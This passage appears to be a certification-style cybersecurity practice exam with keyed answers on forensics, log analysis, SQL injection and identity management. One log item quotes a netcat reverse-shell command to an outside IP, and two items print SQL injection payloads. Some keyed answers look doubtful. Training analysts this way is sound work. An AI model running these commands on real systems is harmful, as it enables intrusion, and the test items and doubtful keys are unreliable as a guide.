B. Suspend the machine and copy the contents of the directory it resides in The best option is to suspend the machine and copy the directory contents as long as you ensure you protect the integrity of the files by conducting a hash on them before and after copying the files. This procedure will store the virtual machine's RAM and disk contents. Since a virtual machine stores all of its data in a single file/folder on a host's hard drive, you can copy the entire Copying the folder will give all the information needed. Still, the virtual machine should not be powered off because creating a copy of the drive is unnecessary because the files would still have to be validated. Live acquisition relies on a specialist hardware or software tool that can capture memory contents while the computer is running. This is unnecessary for a virtual machine since suspending a virtual machine writes the entire memory contents to a file on the hard disk. Shutting down the machine is a bad idea since this runs the risk that the malware will detect the shutdown process and perform anti-forensics to remove traces of itself. While you could image the entire drive the virtual machine resides on, it is unnecessary, will take much longer, and requires you to shut down the host machine to conduct the bit-by-bit copy.
A cybersecurity analyst is analyzing an employee's workstation that is acting abnormally. The analyst runs the netstat command and reviews the following output: Proto Local Address Foreign address State TCP 0.0.0.0:53 0.0.0.0:0 LISTENING TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT TCP 192.168.1.4:59393 74.125.224.39:443 ESTABLISHED TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED TCP 192.168.1.4:59518 69.171.227.67:443 ESTABLISHED TCP 192.168.1.4:59522 96.16.53.227.67:443 ESTABLISHED TCP 192.168.1.4:59523 96.16.53.227.67:443 ESTABLISHED TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED TCP 192.168.1.4:59538 74.125.224.98:80 ESTABLISHED TCP 192.168.1.4:59539 74.125.224.98:80 ESTABLISHED Based on this output, which of the following entries is suspicious? (SELECT THREE) A. TCP 0.0.0.0:135 0.0.0.0:0 LISTENING B. TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED C. TCP 192.168.1.4:59518 69.171.227.67:443 ESTABLISHED D. TCP 0.0.0.0:53 0.0.0.0:0 LISTENING E. TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED F. TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT
B. TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED D. TCP 0.0.0.0:53 0.0.0.0:0 LISTENING F. TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT While we cannot be certain that any malicious activity is ongoing based solely on this netstat output, the three entries concerning port 53 are suspicious and should be further investigated. Port 53 is used for DNS servers to receive requests, and an employee's workstation running DNS would be unusual. If the Foreign Address uses port 53, this would indicate the workstation was conducting a normal DNS lookup, but based on the network traffic direction, this is not the case. The entry that is listening on port 135 is not suspicious for a Windows workstation since this is used to conduct file sharing across a local Windows-based network with NetBIOS. The two entries from a random high number port to a web server (port 80 and port 443) are normal network traffic. The web server listens on a well-known or reserved port (port 80 and port 443) and then responds to the random high number port chosen by the workstation to conduct two-way communications.
You need to perform an architectural review and select a view that focuses on the technologies, settings, and configurations used within the architecture. Which of the following views should you select? A. Logical view B. Technical view C. Operational view D. Acquisition view
B. Technical view A technical view focuses on technologies, settings, and configurations. An operational view looks at how a function is performed or what it accomplishes. A logical view describes how systems interconnect. An acquisition views focus on the procurement process.
You are creating a script to filter some logs so that you can detect any suspected malware beaconing. Which of the following is NOT a typical means of identifying a malware beacon's behavior on the network? A. The beaconing interval B. The beacon's protocol C. The removal of known traffic D. The beacon's persistence
B. The beacon's protocol The beacon's protocol is not typically a means of identifying a malware beacon. A beacon can be sent over numerous protocols, including ICMP, DNS, HTTP, and numerous others. Unless you specifically knew the protocol being used by the suspected beacon, filtering out beacons by the protocol seen in the logs could lead you to eliminate malicious behavior prematurely.
You have just begun an investigation by reviewing the security logs. During the log review, you notice the following lines of code: sc config schedule start auto net start schedule at 10:42 ""c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe "" What BEST describes what is occurring and what action do you recommend to stop it? A. The host (123.12.34.12) is a rogue device on the network; you should recommend removing the host from the network B. The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory to create a remote connection to 123.12.34.12; you should recommend removing the host from the network C. The host (123.12.34.12) is running nc.exe from the temp directory at 10:42 using the auto cron job remotely; No recommendation is required since this is not malicious activity D. The host is beaconing to 123.12.34.12 every day at 10:42 by running nc.exe from the temp directory; you should recommend removing the host from the network
B. The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory to create a remote connection to 123.12.34.12; you should recommend removing the host from the network
Which of the following is NOT a valid reason to conduct reverse engineering? A. To allow an attacker to spot vulnerabilities in an executable B. To allow the software developer to spot flaws in their source code C. To determine how a piece of malware operates D. To commit industrial espionage
B. To allow the software developer to spot flaws in their source code
What kind of security vulnerability would a newly discovered flaw in a software application be considered? A. HTTP header injection vulnerability B. Zero-day vulnerability C. Input validation flaw D. Time-to-check to time-to-use flaw
B. Zero-day vulnerability
Which of the following tools can NOT be used to conduct a banner grab from a web server on a remote host? A. wget B. ftp C. netcat D. telnet
B. ftp FTP cannot be used to conduct a banner grab. A cybersecurity analyst or penetration tester uses a banner grab to gain information about a computer system on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network. This is commonly done using telnet, wget, or netcat.
Raj is working to deploy a new vulnerability scanner for an organization. He wants to verify the information he gets is the most accurate view of the configurations on the organization's traveling salespeople's laptops to determine if any configuration issues could lead to new vulnerabilities. Which of the following technologies would work BEST to collect the configuration information in this situation? A. Server-based scanning B. Non-credentialed scanning C. Agent-based scanning D. Passive network monitoring
C. Agent-based scanning Using agent-based scanning, you typically get the most reliable results for systems that are not connected to the network, as well as the ones that are connected. This is ideal for traveling salespeople since their laptops are not constantly connected to the organization's network. These agent-based scans can be conducted when the laptop is offline and then sent to a centralized server the next time it is connected to the network. Server-based scanning, non-credentialed scanning, and passive network monitoring require a continuous network connection to collect the devices' configurations accurately.
While conducting a static analysis source code review of a program, you see the following line of code: String query = "SELECT * FROM CUSTOMER WHERE CUST_ID=' " + request.getParameter("id") + " ' "; What is the issue with the largest security issue with this line of code? A. The * operator will allow retrieval of every data field about this customer in the CUSTOMER table B. This code is vulnerable to a buffer overflow attack C. An SQL injection could occur because input validation is not being used on the id parameter D. The code is using parameterized queries
C. An SQL injection could occur because input validation is not being used on the id parameter his code takes the input of "id" directly from a user or other program without conducting any input validation. This could be exploited and used as an attack vector for an SQL injection. If a malicious user can alter the ID source, it might get replaced with something like' or '1' ='1. This will cause the SQL statement to become: "SELECT * FROM CUSTOMER WHERE CUST_ID='' or '1'='1'". Because '1' always equals '1', the where clause will always return 'true,' meaning that EVERY record in the database could now become available to the attacker. When creating SQL statements, there are reasons for and against the use of the * operator. Its presence alone does not necessarily indicate a weakness. With only one line of code being reviewed, you cannot make any statement about whether it is vulnerable to a buffer overflow attack. You do not see the declaration values for the initialization of the id variable. This code is not using parameterized queries, but if it did, then it would eliminate this vulnerability. A parameterized query is a type of output encoding that relies on prepared statements to reduce the risk of an SQL injection.
You are conducting a forensic analysis of a hard disk and need to access a file that appears to have been deleted. Upon analysis, you have determined that the file's data fragments exist scattered across the unallocated and slack space of the drive. Which technique could you use to recover the data? A. Overwrite B. Hashing C. Carving D. Recovery
C. Carving File carving is the process of extracting data from an image when that data has no associated file system metadata. A file-carving tool analyzes the disk at the sector/page level. It attempts to piece together data fragments from unallocated and slack space to reconstruct deleted files or at least bits of information from deleted files. File carving depends heavily on file signatures or magic numbers—the sequence of bytes at the start of each file identifies its type. Hashing is a function that converts an arbitrary length string input to a fixed-length string output. Overwrite is a method of writing random bits or all zeros over a hard disk to sanitize it. Recovery is a generic term in forensics, cybersecurity incident response, and other portions of the IT industry, therefore it is not specific enough to be the correct option.
Which of the following types of digital forensic investigations is most challenging due to the on-demand nature of the analyzed assets? A. Employee workstations B. On-premise servers C. Cloud services D. Mobile devices
C. Cloud services
A vulnerability scan has returned the following results: Detailed Results 10.56.17.21 (APACHE-2.4) Windows Shares Category: Windows CVE ID: - Vendor Ref: - Bugtraq ID: - Service Modified - 8.30.2017 Enumeration Resulted: print$ c:\windows\system32\spool\drivers files c:\FileShare\Accounting Temp c:\temp What best describes the meaning of this output? A. Windows Defender has a known exploit that must be resolved or patched B. There is an unknown bug in an Apache server with no Bugtraq ID C. Connecting to the host using a null session allows enumeration of the share names on the host D. There is no CVE present, so this is a false positive caused by Apache running on a Windows server
C. Connecting to the host using a null session allows enumeration of the share names on the host These results from the vulnerability scan conducted show an enumeration of open Windows shares on an Apache server. The enumeration results show three share names (print$, files, Temp) were found using a null session connection. There is no associated CVE with this vulnerability, but it is not a false positive. Not all vulnerabilities have a CVE associated with them. Nothing in this output indicates anything concerning Windows Defender, so this is not the correct answer. Bugtraq IDs are a different type of identification number issued for vulnerabilities by SecurityFocus. Generally, if there is a CVE, there will also be a Bugtraq ID. Both the CVE and Bugtraq ID being blank is not suspicious since we are dealing with a null enumeration result.
You have just returned from a business trip to a country with a high intellectual property theft rate. Which of the following precautions should you take before reconnecting your laptop to your corporate network? (SELECT TWO) A. The laptop's hard drive should have full-disk encryption enabled B. The laptop should be permanently destroyed C. The laptop should be physically inspected and compared with images made before you left D. The laptop's hard drive should be degaussed before use E. The laptop should be sanitized and reimaged F. The laptop should be scanned for malware
C. The laptop should be physically inspected and compared with images made before you left F. The laptop should be scanned for malware
Jay is replacing his organization's current vulnerability scanner with a new tool. As he begins to create the scanner's configurations and scanning policy, he notices a conflict in the settings recommended between different documents. Which of the following sources must Jay follow when trying to resolve these conflicts? A. Configuration settings from the prior system B. NIST guideline documents C. Corporate policy D. Vendor best practices
C. Corporate policy Policies are formalized statements that apply to a specific area or task. Policies are mandatory, and employees who violate a policy may be disciplined. Guidelines are general, non-mandatory recommendations. Best practices are considered procedures that are accepted as being correct or most effective but are not mandatory to be followed. Configuration settings from the prior system could be helpful, but this is not a mandatory compliance area like a policy. Therefore, Jay should first follow the policy before the other three options if there is a conflict.
Which of the following is a senior role with the ultimate responsibility for maintaining confidentiality, integrity, and availability in a system? A. Data custodian B. Data steward C. Data owner D. Privacy officer
C. Data owner A data owner is responsible for the confidentiality, integrity, availability, and privacy of information assets. They are usually senior executives and somebody with authority and responsibility.
You have been asked to provide some training to Dion Training's system administrators about the importance of proper patching of a system before deployment. To demonstrate the effects of deploying a new system without patching it first, you ask the system administrators to provide you with an image of a brand-new server they plan to deploy. How should you deploy the image to demonstrate the vulnerabilities exposed while maintaining the security of the corporate network? A. Deploy the vulnerable image to a virtual machine on a physical server, create an ACL to restrict all incoming connections to the system, then scan it for vulnerabilities B. Deploy the image to a brand new physical server, connect it to the corporate network, then conduct a vulnerability scan to demonstrate how many vulnerabilities are now on the network C. Deploy the system image within a virtual machine, ensure it is in an isolated sandbox environment, then scan it for vulnerabilities D. Utilize a server with multiple virtual machine snapshots installed o it, restore from a known compromised image, then scan it for vulnerabilities
C. Deploy the system image within a virtual machine, ensure it is in an isolated sandbox environment, then scan it for vulnerabilities
Dion Consulting Group has recently received a contract to develop a networked control system for a self-driving car. The company's CIO is concerned about the liability of a security vulnerability being exploited that may result in the death of a passenger or an innocent bystander. Which of the following methodologies would provide the single greatest mitigation if successfully implemented? A. Rigorous user acceptance testing B. Peer review of source code C. Formal methods of verification D. DevSecOps
C. Formal methods of verification Formal verification methods use a mathematical model of the inputs and outputs of a system to prove that the system works as specified in all cases. Given the level of certainty achieved through formal verification methods, this approach provides the single greatest mitigation against this threat. Formal methods are designed for use in critical software in which corner cases must be eliminated. For example, what should the car do if a child jumps out in front of it, and the only way to avoid the child is to swear off the road (which might kill the driver)? This is a classic corner case that needs to be considered for a self-driving car. User acceptance testing (UAT) is a beta phase of software testing. When the developers have tested the software, it is installed to a limited set of users who follow test schemes and report findings. DevSecOps is a combination of software development, security operations, and systems operations and integrates each discipline with the others. Peer review of source code allows for the review of uncompiled source code by other developers. While DevSecOps, peer review, and user acceptance testing help bring down the system's risk, only a formal method of verification could limit the liability involved with such a critical application as a self-driving car.
You have just received some unusual alerts on your SIEM dashboard and want to collect the payload associated with it. Which of the following should you implement to effectively collect these malicious payloads that the attackers are sending towards your systems without impacting your organization's normal business operations? A. Jumpbox B. Sandbox C. Honeypot D. Containerization
C. Honeypot A honeypot is a host set up to lure attackers away from the actual network components and/or discover attack strategies and weaknesses in the security configuration. A jumpbox is a hardened server that provides access to other hosts. A sandbox is a computing environment isolated from a host system to guarantee that the environment runs in a controlled, secure fashion. Containerization is a type of virtualization applied by a host operating system to provide an isolated execution environment for an application.
Which of the following is not considered a component that belongs to the category of identity management infrastructure? A. Auditing system B. LDAP C. Human resource system D. Provisioning engine
C. Human resource system
Which type of monitoring would utilize a network tap? A. Router-based B. Active C. Passive D. SNMP
C. Passive Network taps are devices that allow a copy of network traffic to be captured for analysis. They conduct passive network monitoring and visibility without interfering with the network traffic itself.
You are reviewing the logs in your HIDS and see that entries were showing SYN packets received from a remote host targeting each port on your web server from 1 to 1024. Which of the following MOST likely occurred? A. UDP probe B. The remote host cannot find the right service port C. Port scan D. SYN flood
C. Port scan Based on the description provided, this is most likely a port scan. Using a tool like nmap, an attacker can create an SYN scan across every port in the range against the desired target. A port scan or SYN scan may trigger an alert in your IDS. While scanners support more stealthy scans, default scans may connect to each port sequentially. The other options are incorrect because a remote host will typically connect to only a single port associated with a service. An SYN flood normally sends many SYNs to a single system. Still, it doesn't send them to unused ports, and a UDP probe will not send SYN packets.
Which tool should a malware analyst utilize to track the registry's changes and the file system while running a suspicious executable on a Windows system? A. Autoruns B. ProcDump C. Process Monitor D. DiskMon
C. Process Monitor Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry, and process/thread activity. Autoruns shows you what programs are configured to run during system bootup or login. ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. DiskMon is an application that logs and displays all hard disk activity on a Windows system. This question may seem beyond the scope of the exam. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!
Fail To Pass Systems has just been the victim of another embarrassing data breach. Their database administrator needed to work from home this weekend, so he downloaded the corporate database to his work laptop. On his way home, he left the laptop in an Uber, and a few days later, the data was posted on the internet. Which of the following mitigations would have provided the greatest protection against this data breach? A. Require data masking for any information stored in the database B. Require a VPN to be utilized for all telework employees C. Require data at rest encryption on all endpoints D. Require all new employees to sign an NDA
C. Require data at rest encryption on all endpoints
You are reviewing the IDS logs and notice the following log entry: (where [email protected] and password=' or 7==7') What type of attack is being performed? A. XML injection B. Header manipulation C. SQL injection D. Cross-site scripting
C. SQL injection SQL injection is a code injection technique that is used to attack data-driven applications. SQL injections are conducted by inserting malicious SQL statements into an entry field for execution. For example, an attacker may try to dump the contents of the database by using this technique. A common SQL injection technique is to insert an always true statement, such as 1 == 1, or in this example, 7 == 7. Header manipulation is the insertion of malicious data, which has not been validated, into an HTTP response header. XML Injection is an attack technique used to manipulate or compromise an XML application or service's logic. The injection of unintended XML content and/or structures into an XML message can alter the application's intended logic. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user.
A forensics team follows documented procedures while investigating a data breach. The team is currently in the first phase of its investigation. Which of the following processes would they perform during this phase? A. Document and prove the integrity of evidence B. Create a report of the methods and tools used C. Secure the scene to prevent contamination of evidence D. Make a copy of the evidence
C. Secure the scene to prevent contamination of evidence
Which type of personnel control is being implemented if Kirsten must receive and inventory any items that her coworker, Bob, orders? A. Background checks B. Mandatory vacation C. Separation of duties D. Dual control
C. Separation of duties
Which of the following techniques would be the most appropriate solution to implementing a multi-factor authentication system? A. Username and password B. Fingerprint and retinal scan C. Smartcard and PIN D. Password and security question
C. Smartcard and PIN
Which of the following will an adversary do during the exploitation phase of the Lockheed Martin kill chain? (SELECT THREE) A. A backdoor/implant is placed on a victim's client B. Select backdoor implant and appropriate command and control infrastructure for operation C. Take advantage of a software, hardware, or human vulnerability D. Wait for a user to click on a malicious link E. A webshell is installed on a web server F. Wait for a malicious email attachment to be opened
C. Take advantage of a software, hardware, or human vulnerability D. Wait for a user to click on a malicious link F. Wait for a malicious email attachment to be opened
An attacker has compromised a virtualized server. You are conducting forensic analysis as part of the recovery effort but found that the attacker deleted a virtual machine image as part of their malicious activity. Which of the following challenges do you now have to overcome as part of the recovery and remediation efforts? A. File formats used by some hypervisors cannot be analyzed with traditional forensic tools B. All log files are stored within the VM disk image, therefore, they are lost C. The attack widely fragmented the image across the host file system D. You will need to roll back to an early snapshot and then merge any checkpoints to the main image
C. The attack widely fragmented the image across the host file system Due to the VM disk image's deletion, you will now have to conduct file carving or other data recovery techniques to recover and remediate the virtualized server. If the server's host uses a proprietary file system, such as VMFS on ESXi, this can further limit support by data recovery tools. The attacker may have widely fragmented the image across the host file system when they deleted the disk image. VM instances are most useful when they are elastic (meaning they optimally spin up when needed) and then destroyed without preserving any local data when security has performed the task, but this can lead to the potential of lost system logs. To prevent this, most VMs also save their logs to an external Syslog server or file. Virtual machine file formats are image-based and written to a mass storage device. Depending on the configuration and VM state, security must merge any checkpoints to the main image, using a hypervisor tool, not recovery from an old snapshot, and then roll forward. It is possible to load VM data into a memory analysis tool, such as Volatility. However, some hypervisors' file formats require conversion first, or they may not support the analysis tool.
An electronics store was recently the victim of a robbery where an employee was injured, and some property was stolen. The store's IT department hired an external supplier to expand its network to include a physical access control system. The system has video surveillance, intruder alarms, and remotely monitored locks using an appliance-based system. Which of the following long-term cybersecurity risks might occur based on these actions? A. These devices are insecure and should be isolated from the internet B. There are no new risks due to the install and the company has a stronger physical security posture C. These devices should be isolated from the rest of the enterprise network D. These devices should be scanned for viruses before installation
C. These devices should be isolated from the rest of the enterprise network
Which of the following is not normally part of an endpoint security suite? A. Software firewall B. Anti-virus C. VPN D. IPS
C. VPN Endpoint security includes software host-based firewalls, host-based intrusion protection systems (HIPS), and anti-virus software. A VPN is not typically considered an endpoint security tool because it is a network security tool.
Barrett needs to verify settings on a macOS computer to ensure that the configuration he expects is currently set on the system. What type of file is commonly used to store configuration settings for a macOS system? A. The registry B. .config files C. plists D. .profile files
C. plists
Your company is adopting a new BYOD policy for tablets and smartphones. Which of the following would allow the company to secure the sensitive information on personally owned devices and the ability to remote wipe corporate information without the user's affecting personal data? A. Face ID B. Long and complex passwords C. Touch ID D. Containerization
D. Containerization Containerization is the logical isolation of enterprise data from personal data while co-existing in the same device. The major benefit of containerization is that administrators can only control work profiles that are kept separate from the user's personal accounts, apps, and data. This technology creates a secure vault for your corporate information. Highly targeted remote wiping is supported with most container-based solutions.
Fail to Pass Systems has recently moved its corporate offices from France to Westeros, a country with no meaningful privacy regulations. The marketing department believes that this move will allow the company to resell all of its customer's data to third-party companies and shield the company from any legal responsibility. Which policy is violated by this scenario? A. Data enrichment B. Data minimization C. Data limitation D. Data sovereignty
D. Data sovereignty While the fictitious Westeros may have no privacy laws or regulations, the laws of the countries where the company's customers reside may still retain sovereignty over the data obtained from those regions during the company's business there. This is called Data Sovereignty. Data sovereignty refers to a jurisdiction (such as France or the European Union) preventing or restricting processing and storage from taking place on systems that do not physically reside within that jurisdiction. Data sovereignty may demand certain concessions on your part, such as using location-specific storage facilities in a cloud service. Fail to Pass Systems will likely face steep fines from different regions if they go through with their plan to sell all of their customers' data to the highest bidders. Fail to Pass Systems may even be blocked from communicating with individual regions. Although Data minimization and data limitation policies may be violated depending on the company's internal policies, these policies are not legally binding like the provisions of GDPR are. Data enrichment means that the machine analytics behind the view of a particular alert can deliver more correlating and contextual information with a higher degree of confidence, both from within the local network's data points and from external threat intelligence.
In which phase of the security intelligence cycle is input collected from intelligence producers and consumers to improve the implementation of intelligence requirements? A. Analysis B. Dissemination C. Collection D. Feedback
D. Feedback
You are conducting static analysis of an application's source code and see the following: (STRING) page += "<type name='id' type='INT' value='" + request.getParameter("ID") + "'>"; Based on this code snippet, which of the following security flaws exists in this application? A. Race condition B. Improper error handling C. Insufficient logging and monitoring D. Improper input validation
D. Improper input validation
You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the following evidence should you capture first? A. Image of the server's SSD B. ARP cache C. Backup tapes D. L3 cache
D. L3 cache
Which protocol is paired with OAuth2 to provide authentication of users in a federated identity management solution? A. SAML B. ADFS C. Kerberos D. OpenID Connect
D. OpenID Connect OAuth 2 is explicitly designed to authorize claims and not to authenticate users. The implementation details for fields and attributes within tokens are not defined. Open ID Connect (OIDC) is an authentication protocol that can be implemented as special types of OAuth flows with precisely defined token fields. Security Assertion Markup Language (SAML) is an open standard for exchanging authentication and authorization data between parties, in particular, between an identity provider and a service provider. SAML is an XML-based markup language for security assertions. Active Directory Federation Services (ADFS) is a software component developed by Microsoft that can run on Windows Server operating systems to provide users with single sign-on access to systems and applications located across organizational boundaries. Kerberos is a computer network authentication protocol that works based on tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.
Marta's organization is concerned with the vulnerability of a user's account being vulnerable for an extended period of time if their password was compromised. Which of the following controls should be configured as part of their password policy to minimize this vulnerability? A. Minimum password length B. Password history C. Password complexity D. Password expiration
D. Password expiration
You have just completed identifying, analyzing, and containing an incident. You have verified that the company uses self-encrypting drives as part of its default configuration. As you begin the eradication and recovery phase, you must sanitize the storage devices' data before restoring the data from known-good backups. Which of the following methods would be the most efficient to use to sanitize the affected hard drives? A. Incinerate and replace the storage devices B. Conduct zero-fill on the storage devices C. Use a secure erase (SE) utility on the storage devices D. Perform a cryptographic erase (CE) on the storage devices
D. Perform a cryptographic erase (CE) on the storage devices Sanitizing a hard drive can be done using cryptographic erase (CE), secure erase (SE), zero-fill, or physical destruction. In this case, the hard drives already used data at rest. Therefore, the most efficient method would be to choose CE. The cryptographic erase (CE) method sanitizes a self-encrypting drive by erasing the media encryption key and then reimaging the drive. A secure erase (SE) is used to perform the sanitization of flash-based devices (such as SSDs or USB devices) when cryptographic erase is not available. The zero-fill method relies on overwriting a storage device by setting all bits to the value of zero (0), but this is not effective on SSDs or hybrid drives, and it takes much longer than the CE method. The final option is to conduct physical destruction, but since the scenario states that the storage device will be reused, this is not a valid technique. Physical destruction occurs by mechanical shredding, incineration, or degaussing magnetic hard drives.
During which phase of the incident response process does an organization assemble an incident response toolkit? A. Detection and analysis B. Containment, eradication, and recovery C. Post-incident activity D. Preparation
D. Preparation During the preparation phase, the incident response team conducts training, prepares their incident response kits, and researches threats and intelligence. During the detection and analysis phase, an organization focuses on monitoring and detecting any possible malicious events or attacks.
Dion Consulting Group has recently been awarded a contract to provide cybersecurity services for a major hospital chain in 48 cities across the United States. You are conducting a vulnerability scan of the hospital's enterprise network when you detect several devices that could be vulnerable to a buffer overflow attack. Upon further investigation, you determine that these devices are PLCs used to control the hospital's elevators. Unfortunately, there is not an update available from the elevator manufacturer for these devices. Which of the following mitigations do you recommend? A. Recommend immediate disconnection of the elevator's control system from the enterprise network B. Recommend immediate replacement of the PLCs with ones that are not vulnerable to this type of attack C. Conduct a penetration test of the elevator control system to prove that the possibility of this kind of attack exists D. Recommend isolation of the elevator control system from the rest of the production network through the change control process
D. Recommend isolation of the elevator control system from the rest of the production network through the change control process
Dion Training's security team recently discovered a bug in their software's code. The development team released a software patch to remove the vulnerability caused by the bug. What type of test should a software tester perform on the application to ensure that it is still functioning properly after the patch is installed? A. User acceptance testing B. Fuzzing C. Penetration testing D. Regression testing
D. Regression testing Regression testing is re-running functional and non-functional tests to ensure that previously developed and tested software still performs after a change. After installing any patch, it is important to conduct regression testing to confirm that a recent program or code change has not adversely affected existing features or functionality. Fuzzing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failing built-in code assertions, or potential memory leaks. User acceptance testing is a test conducted to determine if the specifications or contract requirements have been met. A penetration test is an authorized simulated cyberattack on a computer system, performed to evaluate the system's security.
Which of the following does a User-Agent request a resource from when conducting a SAML transaction? A. Single sign-on (SSO) B. Relying party (RP) C. Identity provider (IdP) D. Service provider (SP)
D. Service provider (SP) Security assertions markup language (SAML) is an XML-based framework for exchanging security-related information such as user authentication, entitlement, and attributes. SAML is often used in conjunction with SOAP. SAML is a solution for providing single sign-on (SSO) and federated identity management. It allows a service provider (SP) to establish a trust relationship with an identity provider (IdP) so that the SP can trust the identity of a user (the principal) without the user having to authenticate directly with the SP. The principal's User Agent (typically a browser) requests a resource from the service provider (SP).
Mark works as a Department of Defense contracting officer and needs to ensure that any network devices he purchases for his organization's network are secure. He utilizes a process to verify the chain of custody for every chip and component used in the device's manufacturer. What program should Mark utilize? A. Gray market procurement B. White market procurement C. Chain of procurement D. Trusted Foundry
D. Trusted Foundry The US Department of Defense (DoD) has set up a Trusted Foundry Program, operated by the Defense Microelectronics Activity (DMEA). Accredited suppliers have proved themselves capable of operating a secure supply chain, from design to manufacture and testing. The Trusted Foundry program to help assure the integrity and confidentiality of circuits and manufacturing.
Riaan's company runs critical web applications. During a vulnerability scan, Riaan found a serious SQL injection vulnerability in one of their web applications. The system cannot be taken offline to remediate the vulnerability. Which of the following compensating controls should Riaan recommend using until the system can be remediated? A. IPS B. Encryption C. Vulnerability scanning D. WAF
D. WAF WAF (web application firewall) is the best option since it can serve as a compensating control and protect against web application vulnerabilities like an SQL injection until the application can be fully remediated.
During a vulnerability scan, you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on this information, which of the following do you suspect is true? A. Nothing can be determined about this site with the information provided B. The scan will not produce any useful information C. The server assumes you are conducting a DDoS attack D. You are scanning a CDN-hosted copy of the site
D. You are scanning a CDN-hosted copy of the site This result is due to the company using a distributed server model that hosts content on Edge servers worldwide as part of a CDN. A content delivery network (CDN) is a geographically distributed network of proxy servers and their data centers that provide high availability and performance by distributing the service spatially relative to end-users. The requested content may be served from the Edge server's cache or pull the content from the main diontraining.com servers. If you are scanning a web server or application hosted with a CDN, you need to be aware that you might be scanning an edge copy of the site and not receive accurate results. While an edge server usually maintains static content, it is still useful to determine if any vulnerabilities exist in that portion of the site content. Distributed denial-of-service (DDoS) attacks range from small and sophisticated to large and bandwidth-busting. While Akamai does provide excellent DDoS protection capabilities, nothing in this question indicates that the server is attempting to stop your scans or is assuming you are conducting a DDoS attack against it.
You suspect that a service called explorer.exe on a Windows server is malicious, and you need to terminate it. Which of the following tools would NOT be able to terminate it? A. sc B. services.msc C. wmic D. secpol.msc
D. secpol.msc The security policy auditor (secpol.msc) will allow an authorized administrator the option to change a great deal about an operating system, but it cannot explicitly stop a process or service that is already running. The sc.exe command allows an analyst to control services, including terminating them. The Windows Management Instrumentation (wmic) can terminate a service using the following: wmic service <ServiceName> call StopService. The services.msc tool can also enable, start, or terminate a running service.
